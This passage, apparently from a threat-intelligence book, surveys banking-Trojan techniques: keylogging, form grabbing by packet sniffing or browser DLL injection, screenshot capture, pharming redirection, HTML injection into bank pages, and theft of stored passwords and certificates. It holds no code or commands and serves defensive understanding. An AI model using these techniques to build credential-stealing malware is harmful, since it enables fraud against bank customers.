The Evolution of Cyber Fraud Techniques: Trojans and Toolkits
Trojans are the future of cyber fraud and are even beginning to dominate its present. Trojans automate what had previously been done by hand; Trojans simply download a victim's stored information or record the keystrokes, rather than rely upon a user to enter his or her information into a phishing page's fields. Trojan/phishing toolkits also allow users to customize multiple variants of Trojans, which through continuous variability makes them more successful and less immediately detectable.
This, without exaggeration, has revolutionized the phishing scene. An analysis by X-Force in Germany revealed that in 1 week's worth of captured phishing pages (3,256 in total), more than 90 percent stemmed from phishing kits. Moreover, the hosting locations of the malicious code diminish as phishing kits proliferate. Of the same sample, out of 388 total domains hosting the captured pages, only 100 of those held all of the 92 percent of pages made from kits. Of these, 44 percent were hosted on Hong Kong top-level domains (TLDs). In sum, phishing kits make single attackers at least four times, and as much as eight times, more prolific. The trend shows no signs of abating; to the contrary, the kits are growing better every day. They now resemble professionally-designed software suites with aesthetically pleasant user interfaces, updated life cycles, and version control.
Malicious code targeting financial institutions can be broken up into two related categories: targeted code and generic, kit-based Trojans. While malicious code authors design specific Trojan horses to target financial institutions with login systems with more advanced designs than standard username and passwords, less advanced pieces of malicious code such as generic keystroke logging Trojans and generic form-grabbing Trojans also cause financial burdens on institutions.
There are several basic categories of Trojans, differentiated here by their behavioral function, rather than by their design, that is, the manner in which they compromise a system, or distribution scheme.
Keystroke Logging
Keystroke logging software or keyloggers are the simplest forms of information stealing software. Keystroke logging records each key typed on the victim's keyboard. Keystroke logging produces large amounts of data that include spaces, line breaks, and backspace keys. The authors have incorporated keystroke logging in Trojan and Remote Administration Tools (RAT) toolkits since the late 1990s. Keystroke logging became widespread with early Trojans such as BackOrifice, Netbus, and SubSeven. Today, keystroke loggers are features found in many RATs such as Nuclear Rat, ProRAT, and Bifrost. Many other types of Trojans have generic keyloggers that gather large amounts of stolen data, even if the attacker is not targeting specific sites. In addition to RATs, generic keyloggers are often present in online game credential stealing Trojans and various IRC bot families. Keystroke logging is not capable of grabbing forms.
The user in the example above visited a bank's Web site from his or her home computer. The attacker is unable to capture which state the user is a member of. The site presented the user with its SiteKey picture and the user subsequently entered his or her password. The attacker is unable to retrieve enough information to log in from a computer not already registered to that user. If the user was not at his or her home location, the attacker would receive additional fields of text but would not be able to determine the state or to which questions the answers corresponded.
Form Grabbing
Keystroke logging is a way to reveal all text typed by a user. Obvious disadvantages include unmanageable amounts of data and the inability to capture important pieces of data such as drop-down boxes, check boxes, and fields entered without a keyboard. Form grabbing is a generic term given to the ability to capture all fields sent via POST and GET requests by intercepting the form before the browser sends it to the server. Attackers have two primary options to achieve this feat. Attackers can sniff GET and POST requests directly from traffic on the system using libraries such as Windows Packet Capture (WinPCAP). Attackers can also inject dynamic link libraries (DLLs) into browsers to intercept requests before they are sent to the server. Attackers most commonly achieve this by using a browser helper object (BHO) with Internet Explorer. This method has the added advantage of being able to capture requests before they are encrypted and retrieve the results after they are decrypted.
Because most sites that require authentication use Secure Sockets Layer (SSL), this method is the only one that will work. Generic form grabbing for SiteKey users connecting from their validated computers will likely leave attackers with insufficient information to log in from unknown foreign computers. Many Trojans also provide proxy access; however, this can allow attackers to connect from the infected system where they will not be prompted for the additional questions.
Screenshots and Mouse-Event Capturing
Trojan authors added the ability to take screenshots and capture mouse events around the same time they added the ability to log keystrokes. Despite this, many information stealing Trojans that simply copied the techniques of common RATs did not add this ability until banks started using virtual keyboards to enter credentials (see Figure 2.23). If an institution does not currently use virtual keyboards, then the use of this feature in Trojans will not have a significant impact. Screenshots, however, may add value as attackers may want to capture users' SiteKey images for future attacks.
Figure 2.23. A virtual keyboard login.
Phishing and Pharming Trojans
Phishing and pharming Trojans are nearly identical. The core similarity is that when a user intends to go to a certain Web site, their path is redirected and an alternate site is displayed. The confusion stems mainly from the definition of pharming and whether redirecting a user to a specific URL is phishing or pharming, as many security companies' definitions of pharming would count only redirection of the entire domain to a separate IP that then must be able to accept the entire host.
The argument is not important, because both techniques work in essentially the same manner: a user is redirected to a set of convincing templates. The most advanced application of this type of Trojan involves connecting to the real site so that the real SSL exchange happens and the URL bar is left intact while simultaneously overlaying a phishing page.
Hypertext Markup Language (HTML) Injection
HTML injection is a way for attackers to carry out an "on-the-fly" phishing attack. Victims visit their real banking Web site, and HTML additional code is injected into the page after the page is finished loading. This allows attackers to capture fields that are not part of standard forms but provide useful information (Figure 2.24 and Figure 2.25). Attackers also use HTML injection to create pop-ups with virtual keyboards as well as fields to attempt to capture entire transaction number (TAN) sheets.
Figure 2.24. A logon page before an HTML injection.
Figure 2.25. An HTML injection.
Protected Storage Retrieval
Windows 2000, XP, and Server 2003 provide a protected storage system that stores passwords to applications including Internet Explorer, Outlook Express, and MSN. Users that use the "remember my password" feature of Internet Explorer have all of their passwords stored in this area. Firefox also comes with a similar feature to remember form data. Protected storage retrieval is standard in many Trojans and is extremely effective against sites that use standard username and password authentication.
Although exact formats vary by Trojan, it is common to have the ability to export certificates, steal CA (certificate authority) certificates, MY A certificates, ROOT certificates, software publisher certificates (SPCs), personal information exchange (PFX) certificates, and potentially others.
VeriSign iDefense encounters many drop sites with stolen certificates. Although it is unclear how many attackers actually use the certificates they steal, this functionality poses a threat to an institution's clients, as the underlying technology relies on stored certificates to perform transactions.
About the Author
